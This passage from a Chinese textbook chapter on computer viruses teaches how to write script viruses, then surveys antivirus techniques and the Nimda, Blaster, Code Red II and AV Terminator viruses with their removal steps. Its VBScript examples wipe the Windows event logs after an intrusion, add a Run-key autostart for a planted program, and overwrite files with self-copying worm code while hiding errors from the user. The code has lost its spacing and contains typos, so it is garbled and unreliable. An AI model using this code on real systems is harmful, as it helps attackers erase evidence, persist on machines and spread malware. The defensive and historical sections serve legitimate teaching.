(1)消耗系統(tǒng)資源。通過不斷消耗本機(jī)系統(tǒng)資源，使計(jì)算機(jī)不能處理其他進(jìn)程，導(dǎo)致系統(tǒng)與網(wǎng)絡(luò)癱瘓。這類病毒大多是利用JavaScript產(chǎn)生一個死循環(huán)，它可以在有惡意的網(wǎng)站中出現(xiàn)，也可以被當(dāng)做郵件的附件發(fā)給用戶，當(dāng)用戶打開.htm、.vbs附件時，屏幕出現(xiàn)無數(shù)個瀏覽器窗口，使系

統(tǒng)資源耗盡，最后不得不重新啟動主機(jī)。(2)非法向用戶的硬盤寫入文件。這類主要是在網(wǎng)頁或郵件附件中包含有可以格式化本地硬盤的惡意代碼。

(3)IE泄密及利用郵件非法安裝木馬。

下面用VBScript實(shí)例來說明腳本病毒的編寫方法。在記事本中輸入編輯病毒程序，然后保存為以.vbs為后綴的文件，雙擊該文件即可。例13-1刪除日志。

黑客入侵系統(tǒng)成功后，第一件事便是清除日志，日志也是一種運(yùn)行服務(wù)，但不同于http、ftp這樣的服務(wù)，它可以在命令行下先停下，再刪除。在命令行下用neteventlog是不能停止日志服務(wù)的，所以在命令行下刪除日志是很困難的。如果利用VBS腳本編程就比較容易刪除日志。源代碼如下:

strComputer="."

SetobjWMIService=GetObject("winmgmts:"_&"{impersonationLevel=impersonate，

(Backup)}!＼＼"&

_strComputer&"＼root＼cimv2")

dimmylogs(3)

mylogs(1)="application"mylogs(2)="system"

mylogs(3)="security"

forEachlogsinmylogs

SetcolLogFiles=objWMIService.ExecQuery_("Select*fromWin32_NTEventLogFilewhere

LogFileName=′"&logs&"′")

ForEachobjLogfileincolLogFiles

objLogFile.ClearEventLog()

Next

Next在上面的代碼中，首先獲得object對象，然后利用其ClearEventLog()方法刪除日志。

例13-2修改注冊表。

向Windows中添加自啟動程序，使該程序在開機(jī)時自動運(yùn)行，一般木馬程序常常使用該方法將病毒添加到被攻擊者的系統(tǒng)中。假設(shè)該程序在C:＼xxdk文件夾中，文件名為56.exe。源代碼如下:

Dim56Program

SetAutoRunProgram=WScript.CreateObject("WScript.Shell")

RegPath="HKLM＼Software＼Mcirosoft＼Windows＼CurrentVersion＼Run＼"

Type_Name="REG_SZ"

Key_Name="56"

Key_Data="C:＼xxdk＼56.exe"http://該自啟動程序的全路徑文件名

56Program.WriteRegPath&Key_Name，Key_Data，Type_Name//在啟動組中添加自啟動

程序56.exe

MsgBox("success!")13.3.5蠕蟲病毒

蠕蟲病毒是一種通過網(wǎng)絡(luò)傳播的惡性病毒，它具有病毒的一些共性，如傳播性、隱蔽性、破壞性等。但是蠕蟲病毒和一般病毒又有很大的區(qū)別，它具有自己的一些特性。蠕蟲病毒自身副本具有完整性和獨(dú)立性，不利用文件寄生;其復(fù)制形式是自身拷貝，通過系統(tǒng)漏洞進(jìn)行傳染;對網(wǎng)絡(luò)產(chǎn)生拒

絕服務(wù)，以及和黑客技術(shù)相結(jié)合等;在產(chǎn)生的破壞性上，也是普通病毒所不能比擬的，網(wǎng)絡(luò)的發(fā)展可以使蠕蟲病毒在短時間內(nèi)蔓延至整個網(wǎng)絡(luò)，造成網(wǎng)絡(luò)癱瘓。

1.蠕蟲病毒的基本程序結(jié)構(gòu)

蠕蟲病毒的基本程序結(jié)構(gòu)分為傳播模塊、隱藏模塊和目的功能模塊。傳播模塊負(fù)責(zé)蠕蟲病毒的傳播;隱藏模塊在侵入主機(jī)后，隱藏蠕蟲病毒程序，防止被用戶發(fā)現(xiàn);目的功能模塊實(shí)現(xiàn)對計(jì)算機(jī)的控制、監(jiān)視或破壞等功能。

2.蠕蟲病毒的傳播過程

蠕蟲病毒的一般傳播過程分為掃描、攻擊和復(fù)制幾個階段。

(1)掃描:由蠕蟲病毒的掃描功能模塊負(fù)責(zé)探測存在漏洞的主機(jī)。當(dāng)程序向某個主機(jī)發(fā)送探測漏洞的信息并收到成功的反饋信息后，就得到一個可傳播的對象。

(2)攻擊:攻擊模塊按漏洞攻擊步驟自動攻擊步驟(1)中找到的對象，取得該主機(jī)的權(quán)限(一般為管理員權(quán)限)，獲得一個shell。(3)復(fù)制:復(fù)制模塊通過原主機(jī)和新主機(jī)的交互將蠕蟲病毒復(fù)制到新主機(jī)并啟動。

我們可以看到，傳播模塊實(shí)現(xiàn)的實(shí)際上是自動入侵的功能，所以蠕蟲病毒的傳播技術(shù)是蠕蟲病毒技術(shù)的首要技術(shù)，沒有蠕蟲病毒的傳播技術(shù)，也就談不上蠕蟲病毒技術(shù)了?，F(xiàn)在流行的蠕蟲病毒采用的傳播技術(shù)的目標(biāo)一般是盡快地傳播到盡量多的計(jì)算機(jī)中，于是掃描模塊采用的掃描策略是這樣的:隨機(jī)選取某一段IP地址，然后對這一地址段上的主機(jī)進(jìn)行掃描。這樣，隨著蠕蟲病毒的傳播，新感染的主機(jī)也開始進(jìn)行這種掃描，這些掃描程序不知道那些地址已經(jīng)被掃描過，它只是簡單地隨機(jī)掃描互聯(lián)網(wǎng)。于是蠕蟲病毒傳播得越廣，網(wǎng)絡(luò)上的掃描包就越多。雖然掃描程序發(fā)出的探測包很小，但是積少成多，大量蠕蟲病毒的掃描所引起的網(wǎng)絡(luò)擁塞就非常嚴(yán)重。掃描發(fā)送的探測包是根據(jù)不同的漏洞進(jìn)行設(shè)計(jì)的。比如，針對遠(yuǎn)程緩沖區(qū)的溢出漏洞可以發(fā)送溢出代碼來探測，針對Web的CGI漏洞就需要發(fā)送一個特殊的http請求來探測。當(dāng)然，發(fā)送探測代碼之前首先要確定相應(yīng)的端口是否開放，這樣可以提高掃描效率。一旦確認(rèn)漏洞存在后就可以進(jìn)行

相應(yīng)的攻擊步驟，不同的漏洞有不同的攻擊手法，只要明白了漏洞的利用方法，在程序中實(shí)現(xiàn)這一過程就可以了。攻擊成功后，一般是獲得一個遠(yuǎn)程主機(jī)的shell，對Windows2000系統(tǒng)來說就是cmd.exe,得到這個shell后就擁有了對整個系統(tǒng)的控制權(quán)。復(fù)制過程也有多種方法，可以利用系統(tǒng)本身的程序?qū)崿F(xiàn)，也可以用蠕蟲病毒自帶的程序?qū)崿F(xiàn)。復(fù)制過程實(shí)際上就是一個文件傳輸?shù)倪^程，實(shí)現(xiàn)網(wǎng)絡(luò)文

件傳輸很簡單。

蠕蟲病毒的工作方式如圖13-3-4所示。圖13-3-4蠕蟲病毒的工作方式例13-3模仿蠕蟲病毒，設(shè)計(jì)一個簡單的病毒模塊，使其具有創(chuàng)建病毒文件體、搜索程序中病毒標(biāo)記、感染滿足條件的文件等功能。

生成一個文件副本，將病毒代碼拷入其中，并以原文件名作為病毒文件名的前綴，以.vbs作為后綴。以下是文件感染部分的關(guān)鍵代碼:

setfso=createobject(“scripting.filesystemobject”)

;創(chuàng)建一個文件系統(tǒng)對象

setself=fso.opentextfile(wscript.scriptfullname，1)

;讀打開當(dāng)前文件(病毒本身)

vbscopy=self.readall

;讀取病毒全部代碼到字符串變量vbscopy

setap=fso.opentextfile(AA.path，2，ture)

;打開AA文件，準(zhǔn)備寫入病毒代碼

ap.writevbscopy;將病毒代碼覆蓋目標(biāo)文件

ap.close

setcop=fso.getfile(AA.path)

;得到AA文件路徑

cop.copy(AA.path&“.vbs”)

;創(chuàng)建另一個病毒文件(以.vbs為后綴)AA.delete(ture);刪除AA文件上面描述了病毒文件是如何傳染正常文件的:首先將病毒自身代碼賦給字符串變量vbscopy，然后將這個字符串寫到AA文件中，并創(chuàng)建一個以AA為文件名的vbs副本，然后刪除AA文件。

搜索部分scan()函數(shù)采用了一個遞歸的算法遍歷整個分區(qū)的目錄和文件。//該函數(shù)主要用來尋找滿足條件的文件，并生成對應(yīng)文件的一個病毒副本

subscan(folder_);scan函數(shù)定義

onerrorresumenext;如果出現(xiàn)錯誤，直接跳過，防止彈出錯誤窗口引起使用者的注意

setfolder=fso.getfolder(folder_)

setfiles=folder_.files;當(dāng)前目錄的所有文件集合

foreachfileinfilesext=fso.GetExtensionName(file)

;獲取文件后綴

ext=lcase(ext);后綴名轉(zhuǎn)換為小寫字母ifext=“***”then;如果后綴名是***(虛構(gòu)的后綴

名)，則進(jìn)行感染

wscirpt.echo(file)

endif

next

setsubfolders=folder_subfolders

foreachsubfolderinsubfolders;搜索其他目錄:遞歸調(diào)用scan()

scan(subfolder)

next

endsub病毒的出現(xiàn)是必然的，病毒也必將長期存在。反病毒技術(shù)因病毒的出現(xiàn)而出現(xiàn)，并隨病毒技術(shù)的發(fā)展而發(fā)展，也必將長期存在下去。反病毒技術(shù)一般有如下幾種。13.4反病毒技術(shù)

1.特征值掃描技術(shù)

特征值掃描技術(shù)是反病毒軟件檢測病毒所采用的一種最簡單、也是最流行的方法，主要源于模式匹配的思想。反病毒軟件提供商首先收集病毒樣本并采集它們的指紋。成千上萬的病毒特征值被收集到一個數(shù)據(jù)庫中，供病毒掃描器對比時使用。病毒特征值庫被分發(fā)到受保護(hù)的計(jì)算機(jī)系統(tǒng)中，當(dāng)反病毒軟件掃描文件時，將當(dāng)前的文件與病毒特征碼進(jìn)行對比，并檢測是否有文件片斷與已知的病毒樣本吻合。病毒特征值類似于圖13-4-1中一個用十六進(jìn)制字符表示的代碼片段，基于病毒特征值的探測器會把它識別為屬于某個病毒的特征值。圖13-4-1病毒特征值對于基于病毒特征值的檢測方法，最大的挑戰(zhàn)是只有特征值庫中包含了這個特征碼，才能利用這個特征值從受害系統(tǒng)中檢測出該病毒。這意味著反病毒軟件必須不斷地收集和分發(fā)特征值庫，但是，即使快速、頻繁地進(jìn)行更新，匹配病毒特征值的方法仍然有不可克服的缺點(diǎn)。其中原因之一是，

只要病毒制作者稍稍修改病毒代碼，對于特征值庫來說，這又是一個新的病毒，也就是說，病毒特征值庫總是走在病毒之后。另外，病毒制造者可能會創(chuàng)造一個定制的病毒，使其一直保持偽裝直至感染上特定的目標(biāo)，由于沒有廣泛傳播，反病毒軟件開發(fā)人員就有可能漏掉這種病毒的特征碼。反病毒軟件無法阻止大規(guī)模的破壞。該檢測方法另一個大的弱點(diǎn)在于，若一類計(jì)算機(jī)病毒在傳播過程中自動改變自身形態(tài)，不斷改變其代碼，從而使其不能與任何特征值匹

配，那么反病毒軟件將很難為其創(chuàng)建一個可靠的特征碼。因此，在單獨(dú)使用該檢測方法時，此類計(jì)算機(jī)病毒將無法被識別。雖然特征值掃描有前面所述的缺點(diǎn)，但是因?yàn)槠鋻呙杈雀卟⑶宜俣瓤?，所以一直是反病毒技術(shù)發(fā)展過程中的基礎(chǔ)技術(shù)，也是這種技術(shù)目前還在廣泛使用的原因之一。

2.啟發(fā)式分析技術(shù)

變形病毒的出現(xiàn)是病毒發(fā)展的一次飛躍，這類病毒采用加密變形手段，每進(jìn)行一次傳染，病毒體發(fā)生新的變化，存在無數(shù)種的變形，傳統(tǒng)的特征值掃描技術(shù)對這種病毒體已經(jīng)存在嚴(yán)重的局限性。為了提高對未知病毒的判定能力，反病毒領(lǐng)域出現(xiàn)了啟發(fā)式分析這種新的反病毒技術(shù)。啟發(fā)式分析技術(shù)是通過一組規(guī)則集來判斷一個程序是否是病毒的技術(shù)。這些規(guī)則集反映了病毒的特征，如Windows下的PE病毒感染程序后，可能在程序后面增加新節(jié)或修改程序的入口點(diǎn)為最后一節(jié)等。任何具有同樣傳染方式的病毒，不論其變形的手段如何復(fù)雜，變形的形體有多少種變

化，只要抽取到該病毒的傳染規(guī)則，通過啟發(fā)式分析技術(shù)就能準(zhǔn)確地判斷出該病毒是哪種病毒的變形。

啟發(fā)式分析技術(shù)不僅有效地對抗了變形病毒，而且提高了對未知病毒的判斷能力。只要某種未知病毒具有滿足規(guī)則集的傳染形式，啟發(fā)式分析技術(shù)就能準(zhǔn)確地進(jìn)行判斷。啟發(fā)式分析技術(shù)存在的缺陷是會產(chǎn)生誤報(bào)。當(dāng)啟發(fā)式的掃描器分析文件時，它通常會為遇到的類似病毒的特征賦予一個權(quán)值。如果一個文件的權(quán)值超出了某一臨界值，掃描器就將其看做是病毒。

如果掃描器的設(shè)計(jì)者將臨界值設(shè)得太低，用戶就會被錯誤的警報(bào)弄得不知所措;如果臨界值設(shè)得太高，或者類似病毒的特征沒有被恰當(dāng)?shù)囟x，檢測器就會遺漏掉許多病毒。再有，某些正常的程序也可能會因滿足一定的規(guī)則而被判斷為病毒，如有些正常加密或加殼的程序。任意一種情況的

發(fā)生都會使用戶的保護(hù)措施受到限制，除非設(shè)置了恰當(dāng)?shù)撵`敏度。由于很難可靠地模擬處理器，因此啟發(fā)式的檢測方法遠(yuǎn)沒有上面說得那么輕松。評定基于宏的病毒的影響尤其是一個挑戰(zhàn)，因?yàn)樗鼈兊慕Y(jié)構(gòu)和可能的執(zhí)行流程比已經(jīng)編譯過的可執(zhí)行文件更難預(yù)測。

這樣，病毒掃描器不能將啟發(fā)式分析技術(shù)作為檢測病毒借助的唯一技術(shù)，它們也需要配合傳統(tǒng)的特征碼掃描技術(shù)和其他有效的反病毒技術(shù)。

3.完整性驗(yàn)證技術(shù)

除少部分病毒外，大部分現(xiàn)存病毒都要改寫其宿主文件，針對這一特點(diǎn)，一種檢測病毒存在的方法就是找出被意外修改過的文件，這種技術(shù)就是完整性驗(yàn)證技術(shù)。CRC掃描就是完整性驗(yàn)證技術(shù)所采用的一種方法。CRC掃描的原理是計(jì)算磁盤中的實(shí)際文件或系統(tǒng)扇區(qū)的CRC值(校驗(yàn)和)，這些CRC值被殺毒軟件保存到它自己的數(shù)據(jù)庫中，在運(yùn)行殺毒軟件時，用備份的CRC值與當(dāng)前計(jì)算的值進(jìn)行比較，可以知道文件是否已經(jīng)被修改或被病毒感染。CRC掃描是強(qiáng)有力的反病毒工具，100%的病毒都能在進(jìn)入計(jì)算機(jī)時被檢查出來。但這種殺毒方式天生就有一個缺點(diǎn)——效率很低。CRC掃描在病毒已經(jīng)滲透到計(jì)算機(jī)之后，

并不能很快地檢測到，只有過一段時間病毒開始傳播時才會發(fā)現(xiàn)，而且不能檢測新文件中的病毒(例如郵件、軟件文件、備份恢復(fù)的文件或解壓文件)，因?yàn)樵谒臄?shù)據(jù)庫中沒有這些文件的CRC值。此外，有的病毒也會利用CRC掃描的這種“弱點(diǎn)”，只在掃描之前感染新創(chuàng)建的文件。

4.虛擬機(jī)技術(shù)

虛擬機(jī)技術(shù)應(yīng)用于反病毒領(lǐng)域，是反病毒技術(shù)的重大突破，它能模擬一個程序的運(yùn)行環(huán)境，病毒在其中運(yùn)行如同在真實(shí)的環(huán)境中一樣，這樣就不斷顯露出它的病毒特征，這是一種極為理想的反病毒方式，尤其是檢測未知病毒。目前，反病毒虛擬機(jī)不同于VMWare和VirtualPC這些完全仿真計(jì)

算機(jī)資源的虛擬機(jī)，它僅僅是一個虛擬CPU和部分系統(tǒng)功能的模擬，目標(biāo)僅限于模擬可執(zhí)行文件的運(yùn)行，反病毒界又稱之為通用解密器。反病毒虛擬機(jī)最初用于對抗變形病毒，這類病毒能產(chǎn)生無數(shù)種變形，但其運(yùn)行前會執(zhí)行解密程序，并且同一種病毒的無數(shù)種變形解密后的病毒體明文是相同的，因此只要模擬病毒的解密過程，就能還原出病毒體明文，然后采用傳統(tǒng)的特征值掃描技術(shù)進(jìn)行掃描，反病毒虛擬機(jī)在這方面發(fā)揮了強(qiáng)大的功能。目前虛擬機(jī)的處理對象主要是文件型病毒。對于引導(dǎo)型病毒、Word/Excel宏病毒和木馬程序在理論上都是可以通過虛擬機(jī)來處理的，但目前的實(shí)現(xiàn)水平仍相距甚遠(yuǎn)。就像病毒編碼變形使得傳統(tǒng)特征值方法失效一樣，針對虛擬機(jī)的新病毒可以輕易地使虛擬機(jī)失效。雖然虛擬機(jī)也會在實(shí)踐中不斷得到發(fā)展，但是PC的計(jì)算能力有限，反病毒軟件的制造成本也有限，而病毒的發(fā)展可以說是無限的，讓虛擬技術(shù)獲得更加實(shí)際的功效甚至要以此為基礎(chǔ)來清除未知病毒的難度是相當(dāng)大的。

5.沙箱技術(shù)

沙箱技術(shù)是根據(jù)系統(tǒng)中每一個可執(zhí)行程序的訪問資源以及系統(tǒng)賦予的權(quán)限建立應(yīng)用程序的“沙箱”，限制計(jì)算機(jī)病毒的運(yùn)行。每個應(yīng)用程序都運(yùn)行在自己的且受保護(hù)的“沙箱”之中，不能影響其他程序的運(yùn)行。同樣，這些程序的運(yùn)行也不能影響操作系統(tǒng)的正常運(yùn)行，操作系統(tǒng)與驅(qū)動程序也存活在自己的“沙箱”之中。加州大學(xué)Berkeley實(shí)驗(yàn)室開發(fā)了一個基于Solaris操作系統(tǒng)的沙箱系統(tǒng)，應(yīng)用程序經(jīng)過系統(tǒng)底層調(diào)用解釋執(zhí)行，系統(tǒng)自動判斷應(yīng)用程序調(diào)用的底層函數(shù)是否符合系統(tǒng)的安全要求，并決定是否執(zhí)行。對于每個應(yīng)用程序，沙箱都為其準(zhǔn)備了一個配置文件，用于限制該文件能夠訪問的資源與系統(tǒng)賦予的權(quán)限。WindowsXP操作系統(tǒng)提供了一種軟件限制策略，隔離具有潛在危害的代碼。這種隔離技術(shù)其實(shí)也是一種沙箱技術(shù)，可以保護(hù)系統(tǒng)免受通過電子郵件和Internet傳染的各種計(jì)算機(jī)

病毒的侵害。這些策略允許選擇系統(tǒng)管理應(yīng)用程序的方式:應(yīng)用程序既可以被“限制運(yùn)行”，也可以被“禁止運(yùn)行”。通過在“沙箱”中執(zhí)行不受信任的代碼與腳本，系統(tǒng)可以限制甚至防止計(jì)算機(jī)病毒對系統(tǒng)完整性的破壞。

6.其他技術(shù)

其他的計(jì)算機(jī)病毒防御技術(shù)還包括計(jì)算機(jī)免疫技術(shù)、動態(tài)陷阱技術(shù)、軟件模擬技術(shù)、數(shù)據(jù)挖掘技術(shù)、預(yù)先掃描技術(shù)和安全操作系統(tǒng)技術(shù)等?？傊?，大量的反病毒工程人員在多個角度和多個層面對計(jì)算機(jī)病毒防御技術(shù)做著努力，在未來還會有更多、更有效的防御技術(shù)出現(xiàn)，為計(jì)算機(jī)系統(tǒng)的安全

運(yùn)行提供保障。計(jì)算機(jī)病毒發(fā)展到現(xiàn)在，其種類繁多，熟悉一些經(jīng)典的計(jì)算機(jī)病毒是非常有必要的。本節(jié)將對5種經(jīng)典的病毒進(jìn)行介紹，有些還給出防治的方法。13.5典型病毒的特征及清除方法

1.尼姆達(dá)病毒

尼姆達(dá)(W32.Nimda.A@mm)病毒是2001年9月出現(xiàn)的一種破壞力較強(qiáng)的蠕蟲病毒，它通過多種方式進(jìn)行傳播:

(1)通過E-mail將自己發(fā)送出去。

(2)搜索局域網(wǎng)內(nèi)共享網(wǎng)絡(luò)資源。

(3)將病毒文件復(fù)制到?jīng)]有打補(bǔ)丁的微軟(NT/2000)IIS服務(wù)器。

(4)感染本地文件和遠(yuǎn)程網(wǎng)絡(luò)共享文件。

(5)感染瀏覽的網(wǎng)頁。該蠕蟲病毒由JavaScript腳本語言編寫，病毒體長度為57344B，它修改本地驅(qū)動器上的.htm、.html和.asp文件。通過這個病毒，IE和OutlookExpress加載產(chǎn)生readme.eml文件。該文件將尼姆達(dá)蠕蟲病毒作為一個附件包含，因此，不需要拆開或運(yùn)行這個附件，病毒就被執(zhí)行。由于用戶收到帶毒郵件時無法看到附件，因此給防范帶來困難，使病毒也更具隱蔽性。服務(wù)器查殺尼姆達(dá)病毒的方法如下:

(1)安裝IIS補(bǔ)丁(此IIS補(bǔ)丁防止遭受攻擊)及IE相應(yīng)的最新補(bǔ)丁(IE補(bǔ)丁防止瀏覽帶毒網(wǎng)頁時中毒)。

(2)安全隔離。將服務(wù)器隔離，斷開所有網(wǎng)線。

(3)解決病毒留下的后門程序。將IIS服務(wù)Scripts目錄中的Tftp*.exe和Root.exe文件全部移除。

(4)去掉共享。當(dāng)受到尼姆達(dá)病毒的入侵后，系統(tǒng)中會彈出一些新的共享，如C盤、D盤等的共享，應(yīng)該將其共享屬性去掉。(5)查看管理權(quán)限，再查看Administrator組中是否加進(jìn)了Guest用戶，如果是，應(yīng)將Guest用戶從Administrator組中刪除。

(6)查殺病毒。使用殺毒軟件進(jìn)行查殺，徹底清除尼姆達(dá)病毒。

(7)恢復(fù)網(wǎng)絡(luò)連接。

對于客戶端，采取以下方法查殺尼姆達(dá)病毒:

(1)及時斷開所有的網(wǎng)絡(luò)連接。

(2)熱啟動，結(jié)束蠕蟲病毒的進(jìn)程。

(3)在系統(tǒng)的Temp文件目錄下刪除病毒文件。(4)使用干凈無毒的Riched20.dll(約100KB)文件替換染毒的同名的Riched20.dll文件(57344B)。

(5)將系統(tǒng)目錄下的Load.exe文件(57344B)以及Windows根目錄下的Mmc.exe文件徹底刪除，要在各邏輯盤的根目錄下查找Admin.dll文件，如果有，則刪除這些病毒文件，并要查找文件名為Readme.eml的文件，也要將其刪除。(6)如果用戶使用的是WindowsNT或Windows2000操作系統(tǒng)，那么要打開“控制面板”，之后打開“用戶和密碼”，將Administrator組中的Guest帳號刪除。由于尼姆達(dá)病毒用自身覆蓋了SYSTEM目錄下的Riched20.dll文件，因此MicrosoftWord等字處理軟件運(yùn)行不正常。用戶殺毒后，可以從安裝盤里找到相應(yīng)的文件并重新復(fù)制。

2.沖擊波病毒

沖擊波病毒是利用微軟公司公布的RPC漏洞進(jìn)行傳播的。只要是有RPC服務(wù)并且沒有打安全補(bǔ)丁的計(jì)算機(jī)，都存在RPC漏洞，具體涉及的操作系統(tǒng)是Windows2000/XP/Server

2003。沖擊波病毒運(yùn)行時會不停地利用IP掃描技術(shù)尋找網(wǎng)絡(luò)上系統(tǒng)為Windows2000/XP的計(jì)算機(jī)，找到后就利用DCOMRPC緩沖區(qū)漏洞攻擊該系統(tǒng)，一旦攻擊成功，病毒體將會被傳送到對方計(jì)算機(jī)中進(jìn)行感染。該病毒感染系統(tǒng)后，會使計(jì)算機(jī)產(chǎn)生下列現(xiàn)象:系統(tǒng)資源被大量占用，有時會彈出RPC服務(wù)終止的對話框，并且系統(tǒng)反復(fù)重啟，不能收/發(fā)郵件，不能正常復(fù)制文件，無法正常瀏覽網(wǎng)頁，復(fù)制、粘貼等操作受到嚴(yán)重影響，DNS和IIS服務(wù)遭到非法拒絕等。在2003年8月16日以后，該病毒還會使被攻擊的系統(tǒng)喪失更新該漏洞補(bǔ)丁的能力。病毒詳細(xì)說明如下:

(1)病毒運(yùn)行時會將自身復(fù)制到Windows目錄下，并命名為Msblast.exe。

(2)病毒運(yùn)行時會在系統(tǒng)中建立一個名為BILLY的互斥量，目的是保證在內(nèi)存中有一份病毒體，避免用戶發(fā)現(xiàn)。

(3)病毒運(yùn)行時會在內(nèi)存中建立一個名為Msblast.exe的進(jìn)程，該進(jìn)程就是活的病毒體。

(4)病毒會修改注冊表，在HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion

＼Run中添加鍵值windowsautoupdate=msblast.exe，以便每次啟動系統(tǒng)時，病毒都會運(yùn)行。(5)病毒體內(nèi)隱藏有一段文本信息:

IjustwanttosayLOVEYOUSAN!!Billygateswhydoyoumakethispossible?Stopmakingmoneyandfixyoursoftware!!(6)病毒每20s檢測一次網(wǎng)絡(luò)狀態(tài)，當(dāng)網(wǎng)絡(luò)可用時，病毒會在本地的UDP/69端口上建立一個tftp服務(wù)器，并啟動一個攻擊傳播線程，不斷地隨機(jī)生成攻擊地址進(jìn)行攻擊，另外該病毒攻擊時，會首先搜索子網(wǎng)的IP地址，以便就近攻擊。

(7)當(dāng)病毒掃描到計(jì)算機(jī)后，就會向目標(biāo)計(jì)算機(jī)的TCP/135端口發(fā)送攻擊數(shù)據(jù)。

(8)當(dāng)病毒攻擊成功后，便會監(jiān)聽目標(biāo)計(jì)算機(jī)的TCP/4444端口作為后門，并綁定Cmd.exe。然后

蠕蟲病毒會連接到這個端口，發(fā)送tftp命令，回連到發(fā)起進(jìn)攻的主機(jī)，將msblast.exe傳到目標(biāo)計(jì)算機(jī)上并運(yùn)行。(9)當(dāng)病毒攻擊失敗時，可能會造成沒有打補(bǔ)丁的Windows系統(tǒng)RPC服務(wù)崩潰，WindowsXP系統(tǒng)可能會自動重啟計(jì)算機(jī)。該蠕蟲病毒不能成功攻擊WindowsServer2003，但是可以造成WindowsServer2003系統(tǒng)的RPC服務(wù)崩潰，默認(rèn)情況下是系統(tǒng)反復(fù)重啟。(10)病毒檢測到當(dāng)前系統(tǒng)月份是8月之后或者日期是15日之后，就會向微軟的更新站點(diǎn)windows發(fā)動拒絕服務(wù)攻擊，使微軟網(wǎng)站的更新站點(diǎn)無法為用戶提供服務(wù)。沖擊波病毒的發(fā)現(xiàn)和清除方法如下:

(1)病毒通過微軟的最新RPC漏洞進(jìn)行傳播，因此用戶應(yīng)先給系統(tǒng)打上RPC補(bǔ)丁。

(2)病毒運(yùn)行時會建立一個名為BILLY的互斥量，使病毒自身不重復(fù)進(jìn)入內(nèi)存，并且病毒在內(nèi)存中建立一個名為msblast.exe的進(jìn)程，用戶可以用任務(wù)管理器將該病毒進(jìn)程終止。(3)病毒運(yùn)行時會將自身復(fù)制為%systemdir%＼msblast.exe，用戶可以手動刪除該病毒文件(%systemdir%是一個變量，它指的是操作系統(tǒng)安裝目錄中的系統(tǒng)目錄)。

(4)手工清除注冊表的HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼

Run項(xiàng)中的windowsautoupdate=msblast.exe鍵值。

(5)使用防火墻軟件將病毒會用到的135、4444、69等端口禁止，或者使用“TCP/IP篩選”功能禁止這些端口。紅色代碼Ⅱ病毒是紅色代碼病毒的改良版，病毒作者對病毒體做了很多優(yōu)化，同樣可以對紅色代碼病毒可攻擊的聯(lián)網(wǎng)計(jì)算機(jī)發(fā)動進(jìn)攻，它不同于以往的文件型病毒和引導(dǎo)型病毒，只存在于內(nèi)存，傳染時不通過文件這一常規(guī)載體，而是直接從一臺計(jì)算機(jī)內(nèi)存到另一臺計(jì)算機(jī)內(nèi)存。但與紅色代碼病毒不同的是，紅色代碼Ⅱ病毒這種新變型不僅只對英文系統(tǒng)發(fā)動攻擊，還攻擊其他語言的系統(tǒng)，而且這種病毒還可以在遭到攻擊的機(jī)器上植入“特洛伊木馬”，使得被攻擊的機(jī)器“后門大開”。

紅色代碼Ⅱ病毒擁有極強(qiáng)的可擴(kuò)充性，通過程序自行完成的木馬植入工作，使得病毒作者可以通過改進(jìn)此程序來達(dá)到不同的破壞目的。紅色代碼Ⅱ病毒的程序流程如下:當(dāng)本地IIS服務(wù)程序收到某個來自紅色代碼Ⅱ病毒發(fā)的請求數(shù)據(jù)包時，因存在漏洞而導(dǎo)致處理函數(shù)的堆棧溢出(overflow)。當(dāng)函數(shù)返回時，原返回地址已被病毒數(shù)據(jù)包覆蓋，程序運(yùn)行線跑到病毒數(shù)據(jù)包中，此時病毒被激活，并運(yùn)行在IIS服務(wù)程序的堆棧中。病毒代碼首先會判斷內(nèi)存中是否已注冊了一個名為CodeRedⅡ[JP]的Atom(系統(tǒng)用于對象識別)，如果已存在此對象，則表示此機(jī)器已被感染，病毒進(jìn)入無限休眠狀態(tài)，未感染則注冊Atom并創(chuàng)建300個病毒線程。

當(dāng)判斷到系統(tǒng)默認(rèn)的語言ID是中華人民共和國或中國臺灣時，線程數(shù)猛增到600個，創(chuàng)建完畢后初始化病毒體內(nèi)的一個隨機(jī)數(shù)發(fā)生器，此發(fā)生器產(chǎn)生用于病毒感染的目標(biāo)計(jì)算機(jī)IP地址。每個病毒線程每100ms就會向一隨機(jī)地址的80端口發(fā)送長度為3818B的病毒傳染數(shù)據(jù)包。完成上述工作后，病毒將系統(tǒng)目錄下的cmd.exe文件分別復(fù)制到系統(tǒng)根目錄＼inetpub＼scripts和＼progra~1＼common~1＼system＼[JP2]MSADC下，并取名為Root.exe。然后從病毒體內(nèi)釋放出一個木馬程序，復(fù)制到系統(tǒng)根目錄下，并取名為Explorer.exe，此木馬運(yùn)行后會調(diào)用系統(tǒng)原Explorer.exe，運(yùn)行效果和正常Explorer程序無異，但注冊表中的很多項(xiàng)已被修改。由于釋放木馬的代碼是個循環(huán)，如果目的目錄下xplorer.exe發(fā)現(xiàn)被刪，則病毒又會釋放出一個木馬。最后病毒休眠24小時(中文版為48小時)強(qiáng)行重啟計(jì)算機(jī)。當(dāng)病毒線程判斷日期大于2002年10月時，會立刻強(qiáng)行重啟計(jì)算機(jī)。紅色代碼病毒的清除方案如下:

(1)到微軟站點(diǎn)下載并安裝補(bǔ)丁程序。

(2)斷掉網(wǎng)絡(luò)并重新啟動系統(tǒng)，防止病毒通過網(wǎng)絡(luò)再次感染。

(3)刪除以下病毒釋放的木馬程序:

C:＼inetpub＼Scripts＼Root.exe;

D:＼inetpub＼Scripts＼Root.exe;

C:＼progra~1＼Common~1＼System＼MSADC＼Root.exe;

D:＼Progra~1＼Common~1＼System＼MSADC＼Root.exe。使用以下命令刪除文件:

ATTRIBC:＼EXPLORER.EXE-H-A–R;

DELC:＼EXPLORER.EXE;

ATTRIBD:＼EXPLORER.EXE-H-A–R;

DELD:＼EXPLORER.EXE。

(4)將鍵值HKLM＼SOFTWARE＼Microsoft＼WindowsNT＼CurrentVersion＼WinL改為0。

4.AV終結(jié)者病毒

AV終結(jié)者病毒是由隨機(jī)8位數(shù)字和字母組合而成的病毒，是閃存寄生病毒，它是通過閃存等存儲介質(zhì)或者注入服務(wù)器來實(shí)現(xiàn)的。“AV終結(jié)者”病毒運(yùn)行后會在系統(tǒng)中生成如下幾個文件:

C:＼programfiles＼commonfiles＼microsoftshared＼

msinfo＼隨機(jī)生成病毒名.dat;

C:＼programfiles＼commonfiles＼microsoftshared＼

msinfo＼隨機(jī)生成病毒名.dll;

